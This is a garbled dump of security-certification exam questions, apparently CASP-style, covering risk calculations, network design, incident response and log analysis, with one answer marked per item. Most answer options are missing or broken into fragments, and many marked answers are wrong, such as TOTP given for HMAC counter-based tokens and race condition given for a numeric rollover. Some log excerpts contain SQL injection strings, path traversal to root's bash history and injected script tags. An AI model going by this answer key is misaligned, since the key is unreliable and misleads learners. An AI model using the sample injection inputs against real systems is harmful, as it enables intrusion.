Company policy requires that all unsupported operating systems be removed from the network.|The security administrator is using a combination of network based tools to identify such systems|for the purpose of disconnecting them from the network. Which of the following tools, or outputs|from the tools in use, can be used to help the security administrator make an approximate|determination of the operating system in use on the local company network? (Select THREE).|C.|http://www.company.org/documents_private/index.php?search=string#&topic=windows&tcp=pack|et%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4| 192.168.1.3.1051 > 10.46.3.7.80: Flags [none], cksum 0x1800 (correct), win 512, length 0|+Passive banner grabbing

A new IT company has hired a security consultant to implement a remote access system, which|will enable employees to telecommute from home using both company issued as well as personal|computing devices, including mobile devices. The company wants a flexible system to provide|confidentiality and integrity for data in transit to the company’s internally developed application|GU+Company policy prohibits employees from having administrative rights to company issued|devices. Which of the following remote access solutions has the lowest technical complexity?|+RDP server

The IT director has charged the company helpdesk with sanitizing fixed and removable media.|The helpdesk manager has written a new procedure to be followed by the helpdesk staff. This|procedure includes the current standard to be used for data sanitization, as well as the location of|physical degaussing tools. In which of the following cases should the helpdesk staff use the new|procedure? (Select THREE).|+During asset disposal

Since the implementation of IPv6 on the company network, the security administrator has been|unable to identify the users associated with certain devices utilizing IPv6 addresses, even when|the devices are centrally managed.|en1: flags=8863 mtu 1500| ether f8:1e:af:ab:10:a3| inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5| inet 192.168.1.14 netmask 0xffffff00 broadcast 192.168.1.255| inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf| inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary| nd6 options=1| media: autoselect| status: active|Given this output, which of the following protocols is in use by the company and what can the|system administrator do to positively map users with IPv6 addresses in the future? (Select TWO).|+The devices use EUI-64 format

ABC Corporation has introduced token-based authentication to system administrators due to the|risk of password compromise. The tokens have a set of HMAC counter-based codes and are valid|until they are used. Which of the following types of authentication mechanisms does this|statement describe?|+TOTP

A security manager is looking into the following vendor proposal for a cloud-based SIEM solution.|The intention is that the cost of the SIEM solution will be justified by having reduced the number of|incidents and therefore saving on the amount spent investigating incidents.| Proposal:|External cloud-based software as a service subscription costing $5,000 per month. Expected to|reduce the number of current incidents per annum by 50%.|The company currently has ten security incidents per annum at an average cost of $10,000 per|incident. Which of the following is the ROI for this proposal after three years?|+-$30,000

A security administrator wants to deploy a dedicated storage solution which is inexpensive, can|natively integrate with AD, allows files to be selectively encrypted and is suitable for a small|number of users at a satellite office. Which of the following would BEST meet the requirement?|+SAN

A software developer and IT administrator are focused on implementing security in the|organization to protect OSI layer 7. Which of the following security technologies would BEST meet|their requirements? (Select TWO).|+NIPS

The finance department for an online shopping website has discovered that a number of|customers were able to purchase goods and services without any payments. Further analysis|conducted by the security investigations team indicated that the website allowed customers to|update a payment amount for shipping. A specially crafted value could be entered and cause a roll|over, resulting in the shipping cost being subtracted from the balance and in some instances|resulted in a negative balance. As a result, the system processed the negative balance as zero|dollars. Which of the following BEST describes the application issue?|+Race condition

A bank has decided to outsource some existing IT functions and systems to a third party service|provider. The third party service provider will manage the outsourced systems on their own|premises and will continue to directly interface with the bank’s other systems through dedicated|encrypted links. Which of the following is critical to ensure the successful management of system|security concerns between the two organizations?|+ISA

An investigator wants to collect the most volatile data first in an incident to preserve the data that|runs the highest risk of being lost. After memory, which of the following BEST represents the|remaining order of volatility that the investigator should follow?|+File system information, swap files, network processes, system processes and raw disk blocks.

A security architect has been engaged during the implementation stage of the SDLC to review a|new HR software installation for security gaps. With the project under a tight schedule to meet|market commitments on project delivery, which of the following security activities should be|prioritized by the security architect? (Select TWO).|+Perform penetration testing over the HR solution to identify technical vulnerabilities

A company has noticed recently that its corporate information has ended up on an online forum.|An investigation has identified that internal employees are sharing confidential corporate|information on a daily basis. Which of the following are the MOST effective security controls that|can be implemented to stop the above problem? (Select TWO).|+Implement a URL filter to block the online forum

An employee is performing a review of the organization’s security functions and noticed that there|is some cross over responsibility between the IT security team and the financial fraud team. Which|of the following security documents should be used to clarify the roles and responsibilities|between the teams?|+BPA

A security services company is scoping a proposal with a client. They want to perform a general|security audit of their environment within a two week period and consequently have the following|requirements:|Requirement 1 – Ensure their server infrastructure operating systems are at their latest patch|levels|Requirement 2 – Test the behavior between the application and database|Requirement 3 – Ensure that customer data can not be exfiltrated|Which of the following is the BEST solution to meet the above requirements?|+Penetration test, perform social engineering and run a vulnerability scanner

An insurance company has an online quoting system for insurance premiums. It allows potential|customers to fill in certain details about their car and obtain a quote. During an investigation, the|following patterns were detected:|Pattern 1 – Analysis of the logs identifies that insurance premium forms are being filled in but only|single fields are incrementally being updated.| Pattern 2 – For every quote completed, a new customer number is created; due to legacy|systems, customer numbers are running out.|Which of the following is the attack type the system is susceptible to, and what is the BEST way to|defend against it? (Select TWO).|+Apply a hidden field that triggers a SIEM alert

A security tester is testing a website and performs the following manual query:| https://www.comptia.com/cookies.jsp?products=5%20and%201=1| The following response is received in the payload:| “ORA-000001: SQL command not properly ended”|Which of the following is the response an example of?|+Fingerprinting

At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely|slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs|properly again. The administrator has traced the problem to a lab of thin clients that are all booted|at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the|BEST solution? (Select TWO).|+Add guests with more memory to increase capacity of the infrastructure.

An organization has several production critical SCADA supervisory systems that cannot follow the|normal 30-day patching policy. Which of the following BEST maximizes the protection of these|systems from malicious software?|+Configure a firewall with deep packet inspection that restricts traffic to the systems

An administrator believes that the web servers are being flooded with excessive traffic from time to|time. The administrator suspects that these traffic floods correspond to when a competitor makes|major announcements. Which of the following should the administrator do to prove this theory?|+Implement data analytics to try and correlate the occurrence times.

A trucking company delivers products all over the country. The executives at the company would|like to have better insight into the location of their drivers to ensure the shipments are following|secure routes. Which of the following would BEST help the executives meet this goal?|+Install GSM tracking on each product for end-to-end delivery visibility.

A company has adopted a BYOD program. The company would like to protect confidential|information. However, it has been decided that when an employee leaves, the company will not|completely wipe the personal device. Which of the following would MOST likely help the company|maintain security when employees leave?|+Require cloud storage on corporate servers and disable access upon termination

An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router,|the network administrator sets up rules to deny packets with a source address in this subnet from|entering the network, and to deny packets with a destination address in this subnet from leaving|the network. Which of the following is the administrator attempting to prevent?|+BGP route hijacking attacks

Using SSL, an administrator wishes to secure public facing server farms in three subdomains:|dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the|following is the number of wildcard SSL certificates that should be purchased?|+0

A security administrator is assessing a new application. The application uses an API that is|supposed to encrypt text strings that are stored in memory. How might the administrator test that|the strings are indeed encrypted in memory?|+Use fuzzing techniques to examine application inputs

An international shipping company discovered that deliveries left idle are being tampered with.|The company wants to reduce the idle time associated with international deliveries by ensuring|that personnel are automatically notified when an inbound delivery arrives at the transit dock.|Which of the following should be implemented to help the company increase the security posture|of its operations?|+Back office database

The telecommunications manager wants to improve the process for assigning company-owned|mobile devices and ensuring data is properly removed when no longer needed. Additionally, the|manager wants to onboard and offboard personally owned mobile devices that will be used in the|BYOD initiative. Which of the following should be implemented to ensure these processes can be|automated? (Select THREE).|+SIM’s PIN

The risk manager at a small bank wants to use quantitative analysis to determine the ALE of|running a business system at a location which is subject to fires during the year. A risk analyst|reports to the risk manager that the asset value of the business system is $120,000 and, based on|industry data, the exposure factor to fires is only 20% due to the fire suppression system installed|at the site. Fires occur in the area on average every four years. Which of the following is the ALE?|+$6,000

A security administrator is shown the following log excerpt from a Unix system:|2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914|ssh2| 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port|37915 ssh2| 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port|37916 ssh2| 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port|37918 ssh2| 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port|37920 ssh2| 2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924|ssh2|Which of the following is the MOST likely explanation of what is occurring and the BEST|immediate response? (Select TWO).|+An authorized administrator has logged into the root account remotely.

An accountant at a small business is trying to understand the value of a server to determine if the|business can afford to buy another server for D+The risk manager only provided the accountant|with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is|the correct asset value calculated by the accountant?|+$4,800

A risk manager has decided to use likelihood and consequence to determine the risk of an event|occurring to a company asset. Which of the following is a limitation of this approach to risk|management?|+Subjective and based on an individual's experience.

An administrator is implementing a new network-based storage device. In selecting a storage|protocol, the administrator would like the data in transit's integrity to be the most important|concern. Which of the following protocols meets these needs by implementing either AES-CMAC|or HMAC-SHA256 to sign data?|+SMB

A security administrator is tasked with increasing the availability of the storage networks while|enhancing the performance of existing applications. Which of the following technologies should|the administrator implement to meet these goals? (Select TWO).|+LUN masking

A system administrator has just installed a new Linux distribution. The distribution is configured to|be “secure out of the box”. The system administrator cannot make updates to certain system files|and services. Each time changes are attempted, they are denied and a system error is generated.|Which of the following troubleshooting steps should the security administrator suggest?|+Review settings in the SELinux configuration files

A security solutions architect has argued consistently to implement the most secure method of|encrypting corporate messages. The solution has been derided as not being cost effective by|other members of the IT department. The proposed solution uses symmetric keys to encrypt all|messages and is very resistant to unauthorized decryption. The method also requires special|handling and security for all key material that goes above and beyond most encryption systems.|Which of the following is the solutions architect MOST likely trying to implement?|+One time pads

A critical system audit shows that the payroll system is not meeting security policy due to missing|OS security patches. Upon further review, it appears that the system is not being patched at all.|The vendor states that the system is only supported on the current OS patch level. Which of the|following compensating controls should be used to mitigate the vulnerability of missing OS|patches on this system?|+Isolate the system on a secure network to limit its contact with other systems

ODBC access to a database on a network-connected host is required. The host does not have a|security mechanism to authenticate the incoming ODBC connection, and the application requires|that the connection have read/write permissions. In order to further secure the data, a|nonstandard configuration would need to be implemented. The information in the database is not|sensitive, but was not readily accessible prior to the implementation of the ODBC connection.|Which of the following actions should be taken by the security analyst?|configuration.|nonstandard solution.|standards.|standard security configuration.|+Accept the risk in order to keep the system within the company’s standard security

A project manager working for a large city government is required to plan and build a WAN, which|will be required to host official business and public access. It is also anticipated that the city’s|emergency and first response communication systems will be required to operate across the same|network. The project manager has experience with enterprise IT projects, but feels this project has|an increased complexity as a result of the mixed business / public use and the critical|infrastructure it will provide. Which of the following should the project manager release to the|public, academia, and private industry to ensure the city provides due care in considering all|project factors prior to building its new WAN?|+NDA

In a situation where data is to be recovered from an attacker’s location, which of the following are|the FIRST things to capture? (Select TWO).|+Removable media

A security administrator wants to prevent sensitive data residing on corporate laptops and|desktops from leaking outside of the corporate network. The company has already implemented|full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of|the following additional controls MUST be implemented to minimize the risk of data leakage?|(Select TWO).|data in transit.|+A full-system backup should be implemented to a third-party provider with strong encryption for

An information security assessor for an organization finished an assessment that identified critical|issues with the human resource new employee management software application. The assessor|submitted the report to senior management but nothing has happened. Which of the following|would be a logical next step?|+Meet the two key VPs and request a signature on the original assessment.

An IT Manager is concerned about errors made during the deployment process for a new model of|tablet. Which of the following would suggest best practices and configuration parameters that|technicians could follow during the deployment process?|+Automated workflow

An IT manager is concerned about the cost of implementing a web filtering solution in an effort to|mitigate the risks associated with malware and resulting data leakage. Given that the ARO is twice|per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web|filter is $15,000. The web filtering solution will cost the organization $10,000 per year. Which of|the following values is the single loss expectancy of a data leakage event after implementing the|web filtering solution?|+$0

An IT manager is working with a project manager to implement a new ERP system capable of|transacting data between the new ERP system and the legacy system. As part of this process,|both parties must agree to the controls utilized to secure data connections between the two|enterprise systems. This is commonly documented in which of the following formal documents?|+Memorandum of Understanding

A facilities manager has observed varying electric use on the company’s metered service lines.|The facility management rarely interacts with the IT department unless new equipment is being|delivered. However, the facility manager thinks that there is a correlation between spikes in|electric use and IT department activity. Which of the following business processes and/or|practices would provide better management of organizational resources with the IT department’s|needs?|(Select TWO).|+Deploying a radio frequency identification tagging asset management system

A company has a difficult time communicating between the security engineers, application|developers, and sales staff. The sales staff tends to overpromise the application deliverables. The|security engineers and application developers are falling behind schedule. Which of the following|should be done to solve this?|deliverables.|takes so long.|is done.|understand the whole lifecycle.|+Allow the sales staff to shadow the developers and engineers to see how their sales impact the

The DLP solution has been showing some unidentified encrypted data being sent using FTP to a|remote server. A vulnerability scan found a collection of Linux servers that are missing OS level|patches. Upon further investigation, a technician notices that there are a few unidentified|processes running on a number of the servers. What would be a key FIRST step for the data|security team to undertake at this point?|+Capture process ID data and submit to anti-virus vendor for review.

Customers have recently reported incomplete purchase history and other anomalies while|accessing their account history on the web server farm. Upon investigation, it has been|determined that there are version mismatches of key e-commerce applications on the production|web servers. The development team has direct access to the production servers and is most likely|the cause of the different release versions. Which of the following process level solutions would|address this problem?|farm.|+Implement change control practices at the organization level.

A senior network security engineer has been tasked to decrease the attack surface of the|corporate network. Which of the following actions would protect the external network interfaces|from external attackers performing network scanning?|against external network interfaces.|+Remove contact details from the domain name registrar to prevent social engineering attacks.

In an effort to minimize costs, the management of a small candy company wishes to explore a|cloud service option for the development of its online applications. The company does not wish to|invest heavily in IT infrastructure. Which of the following solutions should be recommended?|+A public IaaS

A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided|input to a web page login screen. The code ensures that only the upper case and lower case|letters are entered in the username field, and that only a 6-digit PIN is entered in the password|field. A security administrator is concerned with the following web server log:| 10.235.62.11 – - [02/Mar/2014:06:13:04] “GET|/site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1” 200 5724|Given this log, which of the following is the security administrator concerned with and which fix|should be implemented by the developer?|administrative access, and the developer should strip all nonprintable characters.|characters on the browser side.|implement server side input validation.|developer should ensure strong passwords are enforced.|+The security administrator is concerned with nonprintable characters being used to gain

An educational institution would like to make computer labs available to remote students. The labs|are used for various IT networking, security, and programming courses. The requirements are:|1. Each lab must be on a separate network segment.|2. Labs must have access to the Internet, but not other lab networks.|3. Student devices must have network access, not simple access to hosts on the lab networks.|4. Students must have a private certificate installed before gaining access.|5. Servers must have a private certificate installed locally to provide assurance to the students.|6. All students must use the same VPN connection profile.|7.|Which of the following components should be used to achieve the design in conjunction with|directory services?|between each lab segment|equipment|ACLs on network equipment|routing equipment|+L2TP VPN over TLS for remote connectivity, SAML for federated authentication, firewalls

A small company is developing a new Internet-facing web application. The security requirements|are:|1. Users of the web application must be uniquely identified and authenticated.|2. Users of the web application will not be added to the company’s directory services.|3. Passwords must not be stored in the code.|4.|Which of the following meets these requirements?|+Use OpenID and allow a third party to authenticate users.

A company is trying to decide how to manage hosts in a branch location connected via a slow|WAN link. The company desires to provide the same level of performance and functionality to the|branch office as it provides to the main campus. The company uses Active Directory for its|directory service and host configuration management. The branch location does not have a|datacenter, and the physical security posture of the building is weak. Which of the following|designs is MOST appropriate for this scenario?|two-way trust.|oneway trust.|+Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a

A multi-national company has a highly mobile workforce and minimal IT infrastructure. The|company utilizes a BYOD and social media policy to integrate presence technology into global|collaboration tools by individuals and teams. As a result of the dispersed employees and frequent|international travel, the company is concerned about the safety of employees and their families|when moving in and out of certain countries. Which of the following could the company view as a|downside of using presence technology?|+Insider threat

A finance manager says that the company needs to ensure that the new system can “replay” data,|up to the minute, for every exchange being tracked by the investment departments. The finance|manager also states that the company’s transactions need to be tracked against this data for a|period of five years for compliance. How would a security engineer BEST interpret the finance|manager’s needs?|+Compliance standards

An IT manager is working with a project manager from another subsidiary of the same|multinational organization. The project manager is responsible for a new software development|effort that is being outsourced overseas, while customer acceptance testing will be performed in|house. Which of the following capabilities is MOST likely to cause issues with network availability?|+Source code vulnerability scanning

The IT Security Analyst for a small organization is working on a customer’s system and identifies a|possible intrusion in a database that contains PI+Since PII is involved, the analyst wants to get|the issue addressed as soon as possible. Which of the following is the FIRST step the analyst|should take in mitigating the impact of the potential intrusion?|account passwords.|customer would like to proceed.|+Contact the local authorities so an investigation can be started as quickly as possible.

The Chief Information Security Officer (CISO) at a large organization has been reviewing some|security-related incidents at the organization and comparing them to current industry trends. The|desktop security engineer feels that the use of USB storage devices on office computers has|contributed to the frequency of security incidents. The CISO knows the acceptable use policy|prohibits the use of USB storage devices. Every user receives a popup warning about this policy|upon login. The SIEM system produces a report of USB violations on a monthly basis; yet|violations continue to occur. Which of the following preventative controls would MOST effectively|mitigate the logical risks associated with the use of USB storage devices?|+Revise the corporate policy to include possible termination as a result of violations

Company XYZ finds itself using more cloud-based business tools, and password management is|becoming onerous. Security is important to the company; as a result, password replication and|shared accounts are not acceptable. Which of the following implementations addresses the|distributed login with centralized authentication and has wide compatibility among SaaS vendors?|+Establish a cloud-based authentication service that supports SAML.

A network engineer wants to deploy user-based authentication across the company’s wired and|wireless infrastructure at layer 2 of the OSI model. Company policies require that users be|centrally managed and authenticated and that each user’s network access be controlled based on|the user’s role within the company. Additionally, the central authentication system must support|hierarchical trust and the ability to natively authenticate mobile devices and workstations. Which of|the following are needed to implement these requirements? (Select TWO).|+SAML

The security administrator finds unauthorized tables and records, which were not present before,|on a Linux database server. The database server communicates only with one web server, which|connects to the database server via an account with SELECT only privileges. Web server logs|show the following:|90.76.165.40 – - [08/Mar/2014:10:54:04] “GET calendar.php?create%20table%20hidden|HTTP/1.1” 200 5724| 90.76.165.40 – - [08/Mar/2014:10:54:05] “GET ../../../root/.bash_history HTTP/1.1” 200 5724| 90.76.165.40 – - [08/Mar/2014:10:54:04] “GET index.php?user=<script>Create</script>|HTTP/1.1”|200 5724| The security administrator also inspects the following file system locations on the database server|using the command ‘ls -al /root’| drwxrwxrwx 11 root root 4096 Sep 28 22:45 .| drwxr-xr-x 25 root root 4096 Mar 8 09:30 ..| -rws------ 25 root root 4096 Mar 8 09:30 .bash_history| -rw------- 25 root root 4096 Mar 8 09:30 .bash_history| -rw------- 25 root root 4096 Mar 8 09:30 .profile| -rw------- 25 root root 4096 Mar 8 09:30 .ssh|Which of the following attacks was used to compromise the database server and what can the|security administrator implement to detect such attacks in the future? (Select TWO).|+Privilege escalation

A company Chief Information Officer (CIO) is unsure which set of standards should govern the|company’s IT policy. The CIO has hired consultants to develop use cases to test against various|government and industry security standards. The CIO is convinced that there is large overlap|between the configuration checks and security controls governing each set of standards. Which of|the following selections represent the BEST option for the CIO?|company.|throughout the company.|across the company.|+Issue a RFQ for vendors to quote a complete vulnerability and risk management solution to the

A security administrator was recently hired in a start-up company to represent the interest of|security and to assist the network team in improving security in the company. The programmers|are not on good terms with the security team and do not want to be distracted with security issues|while they are working on a major project. Which of the following is the BEST time to make them|address security issues in the project?|+In the middle of the project

A well-known retailer has experienced a massive credit card breach. The retailer had gone|through an audit and had been presented with a potential problem on their network. Vendors were|authenticating directly to the retailer’s AD servers, and an improper firewall rule allowed pivoting|from the AD server to the DMZ where credit card servers were kept. The firewall rule was needed|for an internal application that was developed, which presents risk. The retailer determined that|because the vendors were required to have site to site VPN’s no other security action was taken.|To prove to the retailer the monetary value of this risk, which of the following type of calculations is|needed?|+Residual Risk calculation

Company A has noticed abnormal behavior targeting their SQL server on the network from a|rogue IP address. The company uses the following internal IP address ranges: 192.10.1.0/24 for|the corporate site and 192.10.2.0/24 for the remote site. The Telco router interface uses the|192.10.5.0/30 IP range.|Instructions: Click on the simulation button to refer to the Network Diagram for CompanyA.|Click on Router 1, Router 2, and the Firewall to evaluate and configure each device.|Task 1: Display and examine the logs and status of Router 1, Router 2, and Firewall interfaces.| Task 2: Reconfigure the appropriate devices to prevent the attacks from continuing to target the|SQL server and other servers on the corporate network. ||||We need to select the exactly the same to configure and then click on Save as shown below|image.| |

An administrator wants to install a patch to an application. Given the scenario, download, verify|and install the patch in the most secure manner.|Instructions: The last install that is completed will be the final submission.||In this case the second link should be used (This may vary in actual exam). The first link showed|the following error so it should not be used. |Also, Two of the link choices used HTTP and not HTTPS as shown when hovering over the links|as shown:| |Since we need to do this in the most secure manner possible, they should not be used.|Finally, the second link was used and the MD5 utility of MD5sum should be used on the install.exe|file as shown. Make sure that the hash matches. |Finally, type in install.exe to install it and make sure there are no signature verification errors. |

Compliance with company policy requires a quarterly review of firewall rules. A new administrator|is asked to conduct this review on the internal firewall sitting between several Internal networks.|The intent of this firewall is to make traffic more restrictive. Given the following information answer|the questions below:|User Subnet: 192.168.1.0/24 Server Subnet: 192.168.2.0/24 Finance Subnet:192.168.3.0/24| Instructions: To perform the necessary tasks, please modify the DST port, Protocol, Action,|and/or|Rule Order columns. Firewall ACLs are read from the top down|Task 1) An administrator added a rule to allow their machine terminal server access to the server|subnet. This rule is not working. Identify the rule and correct this issue.|Task 2) All web servers have been changed to communicate solely over SS+Modify the|appropriate rule to allow communications.| Task 3) An administrator added a rule to block access to the SQL server from anywhere on the|network. This rule is not working. Identify and correct this issue.| Task 4) Other than allowing all hosts to do network time and SSL, modify a rule to ensure that no|other traffic is allowed. ||Firewall rules should be re-arranged to look like this:| |

Company A has experienced external attacks on their network and wants to minimize the attacks|from reoccurring. Modify the network diagram to prevent SQL injections, XSS attacks, smurf|attacks, e-mail spam, downloaded malware, viruses and ping attacks. The company can spend a|MAXIMUM of $50,000 US+A cost list for each item is listed below:|1. Anti-Virus Server - $10,000|2. Firewall-$15,000|3. Load Balanced Server - $10,000|4. NIDS/NIPS-$10,000|5. Packet Analyzer - $5,000|6. Patch Server-$15,000|7. Proxy Server-$20,000|8. Router-$10,000|9. Spam Filter-$5,000|10. Traffic Shaper - $20,000|11. Web Application Firewall - $10,000| Instructions: Not all placeholders in the diagram need to be filled and items can only be used|once. If you place an object on the network diagram, you can remove it by clicking the (x) in the|upper right-hand of the object.|| Answer:||

A manufacturer is planning to build a segregated network. There are requirements to segregate|development and test infrastructure from production and the need to support multiple entry points|into the network depending on the service being accessed. There are also strict rules in place to|only permit user access from within the same zone. Currently, the following access requirements|have been identified:|1. Developers have the ability to perform technical validation of development applications.|2. End users have the ability to access internal web applications.|3. Third-party vendors have the ability to support applications.|4.|In order to meet segregation and access requirements, drag and drop the appropriate network|zone that the user would be accessing and the access mechanism to meet the above criteria.|Options may be used once or not at all. All placeholders must be filled.| Answer:||

An organization is implementing a project to simplify the management of its firewall network flows|and implement security controls. The following requirements exist. Drag and drop the BEST|security solution to meet the given requirements. Options may be used once or not at all. All|placeholders must be filled.|| Answer:||

Sharing sessions with vendors to troubleshoot vendor product-related issues. Drag and drop the|following security controls to match the associated security concern. Options may be used once or|not at all.| Answer:||

The risk manager has requested a security solution that is centrally managed, can easily be|updated, and protects end users' workstations from both known and unknown malicious attacks|when connected to either the office or home network. Which of the following would BEST meet|this requirement?|+HIPS

A software development manager is taking over an existing software development project. The|team currently suffers from poor communication, and this gap is resulting in an above average|number of security-related bugs making it into production. Which of the following development|methodologies involves daily stand-ups designed to improve communication?|+Spiral

Which of the following describes a risk and mitigation associated with cloud data storage?| Mitigation: Strong encryption at rest| Mitigation: Multi-site backups| Mitigation: Dynamic host bus addressing| Mitigation: Two-factor administrator authentication|Topic 2, Risk Management and Incident Response|+Risk: Shared hardware caused data leakage

An insurance company is looking to purchase a smaller company in another country. Which of the|following tasks would the security administrator perform as part of the security due diligence?|+Review switch and router configurations

A new piece of ransomware got installed on a company’s backup server which encrypted the hard|drives containing the OS and backup application configuration but did not affect the deduplication|data hard drives. During the incident response, the company finds that all backup tapes for this|server are also corrupt. Which of the following is the PRIMARY concern?|+Determining how to install HIPS across all server platforms to prevent future incidents

The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce|business costs by outsourcing to a third party company in another country. Functions to be|outsourced include: business analysts, testing, software development and back office functions|that deal with the processing of customer data. The Chief Risk Officer (CRO) is concerned about|the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls|are not implemented?|issues|+Geographical regulation issues, loss of intellectual property and interoperability agreement

A security analyst has been asked to develop a quantitative risk analysis and risk assessment for|the company’s online shopping application. Based on heuristic information from the Security|Operations Center (SOC), a Denial of Service Attack (DoS) has been successfully executed 5|times a year. The Business Operations department has determined the loss associated to each|attack is $40,000. After implementing application caching, the number of DoS attacks was|reduced to one time a year. The cost of the countermeasures was $100,000. Which of the|following is the monetary value earned during the first year of operation?|+$60,000

The Information Security Officer (ISO) is reviewing new policies that have been recently made|effective and now apply to the company. Upon review, the ISO identifies a new requirement to|implement two-factor authentication on the company’s wireless system. Due to budget constraints,|the company will be unable to implement the requirement for the next two years. The ISO is|required to submit a policy exception form to the Chief Information Officer (CIO). Which of the|following are MOST important to include when submitting the exception form? (Select THREE).|+Business or technical justification for not implementing the requirements.

The Chief Information Officer (CIO) is reviewing the IT centric BIA and RA documentation. The|documentation shows that a single 24 hours downtime in a critical business function will cost the|business $2.3 million. Additionally, the business unit which depends on the critical business|function has determined that there is a high probability that a threat will materialize based on|historical data. The CIO’s budget does not allow for full system hardware replacement in case of a|catastrophic failure, nor does it allow for the purchase of additional compensating controls. Which|of the following should the CIO recommend to the finance director to minimize financial loss?|+The company should mitigate the risk.

A company is in the process of outsourcing its customer relationship management system to a|cloud provider. It will host the entire organization’s customer database. The database will be|accessed by both the company’s users and its customers. The procurement department has|asked what security activities must be performed for the deal to proceed. Which of the following|are the MOST appropriate security activities to be performed as part of due diligence? (Select|TWO).|+Physical penetration test of the datacenter to ensure there are appropriate controls.

An organization is selecting a SaaS provider to replace its legacy, in house Customer Resource|Management (CRM) application. Which of the following ensures the organization mitigates the risk|of managing separate user credentials?|+Ensure the SaaS provider supports dual factor authentication.

After a security incident, an administrator would like to implement policies that would help reduce|fraud and the potential for collusion between employees. Which of the following would help meet|these goals by having co-workers occasionally audit another worker's position?|+Least privilege

A large organization has recently suffered a massive credit card breach. During the months of|Incident Response, there were multiple attempts to assign blame for whose fault it was that the|incident occurred. In which part of the incident response phase would this be addressed in a|controlled and productive manner?|+During the Identification Phase

A security manager for a service provider has approved two vendors for connections to the service|provider backbone. One vendor will be providing authentication services for its payment card|service, and the other vendor will be providing maintenance to the service provider infrastructure|sites. Which of the following business agreements is MOST relevant to the vendors and service|provider’s relationship?|+Memorandum of Agreement

A large enterprise acquires another company which uses antivirus from a different vendor. The|CISO has requested that data feeds from the two different antivirus platforms be combined in a|way that allows management to assess and rate the overall effectiveness of antivirus across the|entire organization. Which of the following tools can BEST meet the CISO’s requirement?|+GRC

Which of the following provides the BEST risk calculation methodology?|+Annual Loss Expectancy (ALE) x Value of Asset

A security policy states that all applications on the network must have a password length of eight|characters. There are three legacy applications on the network that cannot meet this policy. One|system will be upgraded in six months, and two are not expected to be upgraded or removed from|the network. Which of the following processes should be followed?|+Establish a risk matrix

The senior security administrator wants to redesign the company DMZ to minimize the risks|associated with both external and internal threats. The DMZ design must support security in|depth, change management and configuration processes, and support incident reconstruction.|Which of the following designs BEST supports the given requirements?|administrator.|logging to the cloud.|the change control team.|logging to the same hardware.|+A dual firewall DMZ with remote logging where each firewall is managed by a separate

A large hospital has implemented BYOD to allow doctors and specialists the ability to access|patient medical records on their tablets. The doctors and specialists access patient records over|the hospital’s guest WiFi network which is isolated from the internal network with appropriate|security controls. The patient records management system can be accessed from the guest|network and requires two factor authentication. Using a remote desktop type interface, the doctors|and specialists can interact with the hospital’s system. Cut and paste and printing functions are|disabled to prevent the copying of data to BYOD devices. Which of the following are of MOST|concern? (Select TWO).|patient data.|+Privacy could be compromised as patient records can be viewed in uncontrolled areas.

The Chief Information Security Officer (CISO) at a company knows that many users store|business documents on public cloud-based storage, and realizes this is a risk to the company. In|response, the CISO implements a mandatory training course in which all employees are instructed|on the proper use of cloud-based storage. Which of the following risk strategies did the CISO|implement?|+Avoid

A forensic analyst receives a hard drive containing malware quarantined by the antivirus|application. After creating an image and determining the directory location of the malware file,|which of the following helps to determine when the system became infected?|+The malware file’s modify, access, change time properties.

The Chief Executive Officer (CEO) of a company that allows telecommuting has challenged the|Chief Security Officer’s (CSO) request to harden the corporate network’s perimeter. The CEO|argues that the company cannot protect its employees at home, so the risk at work is no different.|Which of the following BEST explains why this company should proceed with protecting its|corporate network boundary?|attackers.|are at home.|+The corporate network is the only network that is audited by regulators and customers.

A security officer is leading a lessons learned meeting. Which of the following should be|components of that meeting? (Select TWO).|+Demonstration of IPS system

An assessor identifies automated methods for identifying security control compliance through|validating sensors at the endpoint and at Tier 2. Which of the following practices satisfy|continuous monitoring of authorized information systems?|+Independent verification and validation

The source workstation image for new accounting PCs has begun blue-screening. A technician|notices that the date/time stamp of the image source appears to have changed. The desktop|support director has asked the Information Security department to determine if any changes were|made to the source image. Which of the following methods would BEST help with this process?|(Select TWO).|images.|+Retrieve source system image from backup and run file comparison analysis on the two

A software project manager has been provided with a requirement from the customer to place|limits on the types of transactions a given user can initiate without external interaction from|another user with elevated privileges. This requirement is BEST described as an implementation|of:|+an administrative control

The technology steering committee is struggling with increased requirements stemming from an|increase in telecommuting. The organization has not addressed telecommuting in the past. The|implementation of a new SSL-VPN and a VOIP phone solution enables personnel to work from|remote locations with corporate assets. Which of the following steps must the committee take|FIRST to outline senior management’s directives?|systems.|PII from personal equipment.|equipment.|telecommuting.|+Develop an information classification scheme that will properly secure data on corporate

A company is facing penalties for failing to effectively comply with e-discovery requests. Which of|the following could reduce the overall risk to the company from this issue?|encryption.|user passwords.|Topic 3, Research and Analysis|+Establish a policy that only allows filesystem encryption and disallows the use of individual file

